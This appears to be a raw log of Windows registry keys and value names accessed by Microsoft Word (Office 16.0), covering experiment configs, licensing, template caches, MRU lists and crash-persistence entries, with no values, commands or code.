AutoRecoverySaveIntervalMetadata
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word
|
Language
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word
|
EcsRequestPending
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word
|
SubscriptionCustomerLicenseInfo
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options
|
FirstRun
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options
|
ACUpdated
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Options
|
DefaultKerningLigatures
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\WEF
|
Word_RequireForceRefreshAtBoot
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\StartupItems
|
f$<
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ReviewCycle
|
ReviewToken
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\BootTimeSkuOverride
|
{30CAC893-3CA4-494C-A5E9-A99141352216}
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Licensing\CachedLicenseData
|
winword.exe
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru
|
FOLDERID_Desktop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\file mru
|
FOLDERID_Documents
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU
|
FOLDERID_Desktop
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Place MRU
|
FOLDERID_Documents
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\3D64D
|
3D64D
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\FileBlock
|
FileTypeBlockList
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\FileBlock
|
OoxmlConverterBlockList
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
|
SpellingAndGrammarFiles_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
|
SpellingAndGrammarFiles_1036
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
|
SpellingAndGrammarFiles_3082
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word
|
WordName
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Experiment\word
|
BuildNumber
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
|
Expires
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.1
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.2
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.3
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.4
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.5
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.6
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.7
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.8
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.9
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.10
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.11
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.12
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.13
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.14
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.15
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.16
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.17
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.18
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.19
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.20
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.21
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.22
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.23
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.24
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.25
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.26
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.27
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.28
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.29
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
1.30
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
VersionId
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
|
ETag
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
|
DeferredConfigs
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
|
ConfigIds
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
|
RoamingLastSyncTimeWord
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
|
RoamingLastWriteTimeWord
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
|
NULL
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
|
ClockTimeSeconds
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\IdentityCRL\ClockData
|
TickCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
|
1
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Shared Tools\Proofing Tools\1.0\Custom Dictionaries
|
UpdateComplete
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\ClientTelemetry\Volatile
|
MsaDevice
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851216
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328884
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03090430
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457444
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033917
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328893
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328905
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851217
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328908
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033919
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328916
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033921
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457464
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033925
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
|
TM03998158
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
|
TM01840907
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457475
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM10001114
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851218
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851219
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851220
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851221
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328919
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851222
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
|
TM03998159
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328925
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851223
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851224
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033927
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457485
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457491
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851225
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457496
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM10001115
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328932
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328935
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457503
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328940
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328998
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457510
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851227
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033929
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328972
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328951
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
|
TM02835233
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328975
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328983
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328986
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851226
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM04033937
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328990
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03457515
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
TM03090434
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
NextUpdate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
LastUpdate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
NextUpdate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
LastUpdate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
NextUpdate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\Themes\1033
|
LastUpdate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
|
LastUpdate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Word\Security\Trusted Documents
|
LastPurgeTime
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
|
en-CH
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
|
en-GB
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
|
en-CH
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
|
en-GB
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet
|
msoridShouldUseReauthRequestProxy
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common
|
SessionId
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6292
|
0
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6292
|
0
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6292
|
0
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6292
|
0
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6292
|
0
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=8192&build=16.0.16827&crev=3\0
|
FilePath
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=8192&build=16.0.16827&crev=3\0
|
StartDate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache\AllUsers\officeclient.microsoft.com\config16--syslcid=8192&build=16.0.16827&crev=3\0
|
EndDate
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6292
|
0
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
|
SpellingAndGrammarFiles_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
|
SpellingAndGrammarFiles_1033
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
|
SpellingAndGrammarFiles_1036
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
|
SpellingAndGrammarFiles_1036
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
|
SpellingAndGrammarFiles_3082
|
||
|
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\ClickToRun\REGISTRY\MACHINE\Software\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
|
SpellingAndGrammarFiles_3082
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Internet\WebServiceCache
|
LastClean
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word\ConfigContextData
|
ChunkCount
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\ExperimentConfigs\Ecs\word
|
Expires
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\Common\CrashPersistence\WINWORD\6292
|
0
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
|
RoamingConfigurableSettings
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\Roaming
|
RoamingConfigurableSettings
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Property
|
0018000DDBA1C086
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Immersive\production\Token\{2B379600-B42B-4FE9-A59C-A312FB934935}
|
DeviceTicket
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328884
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328925
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328905
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocParts\1033
|
TM01840907
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328940
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328972
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328916
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328951
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328990
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328998
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\SmartArt\1033
|
TM03328932
|
||
|
HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\16.0\Common\LCCache\WordDocBibs\1033
|
TM02851219
|
||
|
